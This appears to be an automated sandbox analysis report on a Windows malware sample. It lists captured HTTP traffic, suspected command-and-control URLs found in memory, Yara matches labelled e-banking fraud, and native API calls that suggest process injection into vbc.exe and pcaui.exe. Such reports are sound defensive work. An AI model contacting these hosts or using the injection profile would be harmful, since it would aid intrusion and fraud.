20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 00:28:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 27 Nov 2024 00:28:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 27 Nov 2024 00:28:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 27 Nov 2024 00:28:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 27 Nov 2024 00:28:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96"
                      Source: W3MzrFzSF0.exe, 00000000.00000002.2068035642.0000000002D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: pcaui.exe, 00000008.00000002.4470482798.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003D2A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.matteicapital.online/px.js?ch=1
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.matteicapital.online/px.js?ch=2
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005D70000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.matteicapital.online/sk-logabpstatus.php?a=WUhkRFEzRWdwaG9mYll1MUJoS1N3WXp6TVVHdWk4ZmQ2Z0
                      Source: pDqSqZXvqQcT.exe, 0000000A.00000002.4469698131.0000000004CBC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.questmatch.pro
                      Source: pDqSqZXvqQcT.exe, 0000000A.00000002.4469698131.0000000004CBC000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.questmatch.pro/z3ox/
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000003550000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://dts.gnpge.com
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033.
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033ym
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033I
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: pcaui.exe, 00000008.00000002.4466952395.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: pcaui.exe, 00000008.00000003.2366424762.0000000007B95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005BDE000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.00000000033BE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.bt.cn/?from=404
                      Source: pcaui.exe, 00000008.00000002.4470613713.0000000007C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                      Source: pcaui.exe, 00000008.00000002.4468773018.0000000005728000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467989895.0000000002F08000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: W3MzrFzSF0.exeString found in binary or memory: https://www.mgm.gov.tr/?il=manisa
                      Source: W3MzrFzSF0.exeString found in binary or memory: https://www.tcmb.gov.tr/wps/wcm/connect/tr/tcmb
                      Source: W3MzrFzSF0.exeString found in binary or memory: https://www.trtworld.com/#frmActiveBrowsers

                      E-Banking Fraud

                      Source: Yara match, File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_0042C893 NtClose,6_2_0042C893
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_058C2DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_058C2C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2B60 NtClose,LdrInitializeThunk,6_2_058C2B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C35C0 NtCreateMutant,LdrInitializeThunk,6_2_058C35C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C4650 NtSuspendThread,6_2_058C4650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C4340 NtSetContextThread,6_2_058C4340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2DB0 NtEnumerateKey,6_2_058C2DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2DD0 NtDelayExecution,6_2_058C2DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2D00 NtSetInformationFile,6_2_058C2D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2D10 NtMapViewOfSection,6_2_058C2D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2D30 NtUnmapViewOfSection,6_2_058C2D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2CA0 NtQueryInformationToken,6_2_058C2CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2CC0 NtQueryVirtualMemory,6_2_058C2CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2CF0 NtOpenProcess,6_2_058C2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2C00 NtQueryInformationProcess,6_2_058C2C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2C60 NtCreateKey,6_2_058C2C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2F90 NtProtectVirtualMemory,6_2_058C2F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2FA0 NtQuerySection,6_2_058C2FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2FB0 NtResumeThread,6_2_058C2FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2FE0 NtCreateFile,6_2_058C2FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2F30 NtCreateSection,6_2_058C2F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2F60 NtCreateProcessEx,6_2_058C2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2E80 NtReadVirtualMemory,6_2_058C2E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2EA0 NtAdjustPrivilegesToken,6_2_058C2EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2EE0 NtQueueApcThread,6_2_058C2EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2E30 NtWriteVirtualMemory,6_2_058C2E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2B80 NtQueryInformationFile,6_2_058C2B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2BA0 NtEnumerateValueKey,6_2_058C2BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2BE0 NtQueryValueKey,6_2_058C2BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2BF0 NtAllocateVirtualMemory,6_2_058C2BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2AB0 NtWaitForSingleObject,6_2_058C2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2AD0 NtReadFile,6_2_058C2AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C2AF0 NtWriteFile,6_2_058C2AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3090 NtSetValueKey,6_2_058C3090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3010 NtOpenDirectoryObject,6_2_058C3010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3D10 NtOpenProcessToken,6_2_058C3D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C3D70 NtOpenThread,6_2_058C3D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_058C39B0 NtGetContextThread,6_2_058C39B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D4650 NtSuspendThread,LdrInitializeThunk,8_2_047D4650
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D4340 NtSetContextThread,LdrInitializeThunk,8_2_047D4340
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_047D2C70
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2C60 NtCreateKey,LdrInitializeThunk,8_2_047D2C60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_047D2CA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_047D2D30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_047D2D10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_047D2DF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2DD0 NtDelayExecution,LdrInitializeThunk,8_2_047D2DD0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_047D2EE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_047D2E80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2F30 NtCreateSection,LdrInitializeThunk,8_2_047D2F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2FE0 NtCreateFile,LdrInitializeThunk,8_2_047D2FE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2FB0 NtResumeThread,LdrInitializeThunk,8_2_047D2FB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2AF0 NtWriteFile,LdrInitializeThunk,8_2_047D2AF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2AD0 NtReadFile,LdrInitializeThunk,8_2_047D2AD0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2B60 NtClose,LdrInitializeThunk,8_2_047D2B60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_047D2BF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_047D2BE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_047D2BA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D35C0 NtCreateMutant,LdrInitializeThunk,8_2_047D35C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D39B0 NtGetContextThread,LdrInitializeThunk,8_2_047D39B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2C00 NtQueryInformationProcess,8_2_047D2C00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2CF0 NtOpenProcess,8_2_047D2CF0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2CC0 NtQueryVirtualMemory,8_2_047D2CC0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2D00 NtSetInformationFile,8_2_047D2D00
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2DB0 NtEnumerateKey,8_2_047D2DB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2E30 NtWriteVirtualMemory,8_2_047D2E30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2EA0 NtAdjustPrivilegesToken,8_2_047D2EA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2F60 NtCreateProcessEx,8_2_047D2F60
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2FA0 NtQuerySection,8_2_047D2FA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2F90 NtProtectVirtualMemory,8_2_047D2F90
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2AB0 NtWaitForSingleObject,8_2_047D2AB0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D2B80 NtQueryInformationFile,8_2_047D2B80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3010 NtOpenDirectoryObject,8_2_047D3010
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3090 NtSetValueKey,8_2_047D3090
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3D70 NtOpenThread,8_2_047D3D70
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D3D10 NtOpenProcessToken,8_2_047D3D10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02829630 NtReadFile,8_2_02829630
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028297D0 NtClose,8_2_028297D0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02829720 NtDeleteFile,8_2_02829720
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_028294C0 NtCreateFile,8_2_028294C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_02829940 NtAllocateVirtualMemory,8_2_02829940
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0483CD1F8_2_0483CD1F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047B8DBF8_2_047B8DBF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485CE938_2_0485CE93
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A0E598_2_047A0E59
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485EEDB8_2_0485EEDB
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485EE268_2_0485EE26
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047B2E908_2_047B2E90
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0481EFA08_2_0481EFA0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047C0F308_2_047C0F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E2F288_2_047E2F28
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047ACFE08_2_047ACFE0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04792FC88_2_04792FC8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04842F308_2_04842F30
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04814F408_2_04814F40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A28408_2_047A2840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047AA8408_2_047AA840
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047CE8F08_2_047CE8F0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047868B88_2_047868B8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047B69628_2_047B6962
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0486A9A68_2_0486A9A6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A29A08_2_047A29A0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0479EA808_2_0479EA80
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_04856BD78_2_04856BD7
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485AB408_2_0485AB40
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047914608_2_04791460
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485F43F8_2_0485F43F
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0483D5B08_2_0483D5B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048695C38_2_048695C3
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048575718_2_04857571
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048516CC8_2_048516CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047E56308_2_047E5630
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485F7B08_2_0485F7B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0484F0CC8_2_0484F0CC
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0485F0E08_2_0485F0E0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048570E98_2_048570E9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047A70C08_2_047A70C0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0478F1728_2_0478F172
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047D516C8_2_047D516C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047AB1B08_2_047AB1B0
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0486B16B8_2_0486B16B
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_048412ED8_2_048412ED
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_047BB2C08_2_047BB2C0
